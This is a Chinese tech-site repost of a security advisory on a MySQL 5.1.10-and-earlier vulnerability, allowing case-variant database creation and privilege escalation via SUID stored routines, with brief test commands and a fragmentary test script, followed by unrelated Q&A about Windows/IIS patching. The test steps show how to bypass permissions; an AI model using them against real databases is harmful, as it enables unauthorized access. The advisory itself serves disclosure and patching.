欢迎您访问我爱IT技术网,今天小编为你分享的编程技术是:【MySQL权限提升及安全限制绕过漏洞】,下面是详细的分享!
MySQL权限提升及安全限制绕过漏洞
受影响系统:
MySQL AB MySQL <=5.1.10
描述:
BUGTRAQ ID: 19559
MySQL是一款使用非常广泛的开放源代码关系数据库系统,拥有各种平台的运行版本。
在MySQL上,拥有访问权限但无创建权限的用户可以创建与所访问数据库仅有名称字母大小写区别的新数据库。成功利用这个漏洞要求运行MySQL的文件系统支持区分大小写的文件名。
此外,由于在错误的安全环境中计算了suid例程的参数,攻击者可以通过存储的例程以例程定义者的权限执行任意DML语句。成功攻击要求用户对所存储例程拥有EXECUTE权限。
测试方法:
【警 告:以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!】
1、创建数据库
| 以下为引用的内容:
$ mysql -h my.mysql.server -u sample -p -A sample mysql> create database another; mysql> create database sAmple; |
2、权限提升
| 以下为引用的内容:
--disable_warnings # Prepare playground # Create harmless (but SUID!) function use mysqltest2; connect (malcon, localhost, malory,,mysqltest1); # Correct malory@localhost don't have access to mysqltest2.t1 # Create function which will allow to exploit security hole # Again correct # Oops!!! it seems that f_evil() is executed in the context of connection default; |
建议:
厂商补丁:MySQL AB
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载
以上所分享的是关于MySQL权限提升及安全限制绕过漏洞,下面是编辑为你推荐的有价值的用户互动:
相关问题:单位IT安全扫描结果: Microsoft IIS畸形文件扩展...
答:你的iis是6.0吧 没事升级到iis7 那个暂时只有大家喜欢用的伪静态规则 把asp;jpg这样的文件 重定向到一个页面 >>详细
相关问题:KB2731847windows内核权限提升漏洞 用360修复总是...
答:病毒在变异 系统会有漏洞 病毒木马就会乘虚而入 漏洞就是系统的弊端、弱点。容易被攻击、被攻击者掌握你家电脑的主动权。你可以用360安全卫士进行全盘检查,他有智能修复功能如果它提示系统漏洞要修复,那就是应该要修复的 有的漏洞不用修复他就... >>详细
相关问题:microsoft iis畸形文件扩展名绕过安全限制漏洞怎么...
答:建议换个安全软件排查 试试腾讯电脑管家,杀毒+管理2合1,还可以自动修复漏洞:第一时间发现并修复系统存在的高危漏洞,在不打扰您的情况下自动为系统打上漏洞补丁,轻轻松松将病毒木马拒之门外。自动修复漏洞 电脑管家可以在发现高危漏洞(仅包... >>详细
- 评论列表(网友评论仅供网友表达个人看法,并不表明本站同意其观点或证实其描述)
-
